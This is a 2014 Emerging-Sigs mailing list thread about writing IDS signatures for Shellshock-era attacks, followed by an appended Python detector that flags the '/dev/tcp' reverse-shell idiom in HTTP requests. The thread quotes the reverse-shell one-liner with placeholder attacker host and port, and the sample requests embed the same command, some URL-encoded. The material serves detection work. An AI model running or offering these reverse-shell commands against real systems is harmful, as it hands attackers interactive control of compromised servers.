[Emerging-Sigs] Do you have a rule for this?

Livio Ricciulli livio at metaflows.com
Fri Sep 26 14:41:05 EDT 2014


Yes, we are seeing all kinds of stuff..
But I would think a rule for this would be good independently of the 
bash exploit..
Anything with

bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1

in the payload is probably very bad..

Livio.

On 09/26/2014 11:25 AM, Will Metcalf wrote:
> Was thinking about this, and also curl/wget/etc with args inbound to 
> web_servers. Have also seen direct wgets for ELF bins, Perl DDoS 
> bots, Perl Downloaders etc.
>
> Regards,
>
> Will
>
> On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com 
> <mailto:livio at metaflows.com>> wrote:
>
>     We have been seeing the bash exploit trying to execute:
>
>     bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
>
>     This will give the bad_ip a shell to the attacker. They would
>     typically execute a wget followed by Trojan install.
>
>     I was wondering do you already have a rule that detects the above?
>
>     If someone was executing that in anything, it would be bad I think..
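Added example, not part of the list thread or of any ET ruleset: a small Python check that implements the idea above, flagging the /dev/tcp reverse-shell string in request payloads and pulling out the destination IP and port. The sample request lines, addresses and ports are constructed for the demo.

```python
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import unquote

# The idiom from the thread: interactive (ba)sh with stdout+stderr redirected
# to /dev/tcp/<ip>/<port> and stdin read back from the same socket (0>&1).
# Tolerates extra whitespace, the "&>" spelling of ">&", and a leading path
# such as /bin/bash. Octet and port ranges are validated in code afterwards.
_DEVTCP_SHELL = re.compile(
    r"\b(?:ba)?sh\s+-i\s+(?:>&|&>)\s*/dev/tcp/"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})/(?P<port>\d{1,5})"
    r"\s+0\s*>\s*&\s*1\b"
)


def find_devtcp_shell(payload: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) if the payload carries the /dev/tcp reverse-shell
    string, else None. The payload is URL-decoded first because in HTTP the
    string often arrives in a header or query string with %20 for spaces."""
    m = _DEVTCP_SHELL.search(unquote(payload))
    if m is None:
        return None
    ip, port = m.group("ip"), int(m.group("port"))
    # Drop matches with impossible octets or ports: they are not real targets.
    if any(int(o) > 255 for o in ip.split(".")) or not 1 <= port <= 65535:
        return None
    return ip, port


def scan_requests(lines: Iterable[str]) -> Iterator[Tuple[int, str, int]]:
    """Yield (line_no, ip, port) for every request line that matches."""
    for n, line in enumerate(lines, 1):
        hit = find_devtcp_shell(line)
        if hit is not None:
            yield n, hit[0], hit[1]


# Constructed sample traffic (not real captures): one hit in a header, one
# URL-encoded hit in a query string, and benign lines that must not alert.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/status HTTP/1.1",
    "User-Agent: bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
    "GET /?cmd=bash%20-i%20%3E%26%20/dev/tcp/203.0.113.9/1337%200%3E%261 HTTP/1.1",
    "Referer: http://www.example.com/docs/dev/tcp/tuning",
    "User-Agent: curl/7.38.0",
]

if __name__ == "__main__":
    for line_no, ip, port in scan_requests(SAMPLE_REQUESTS):
        print(f"line {line_no}: reverse shell to {ip}:{port}")
```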
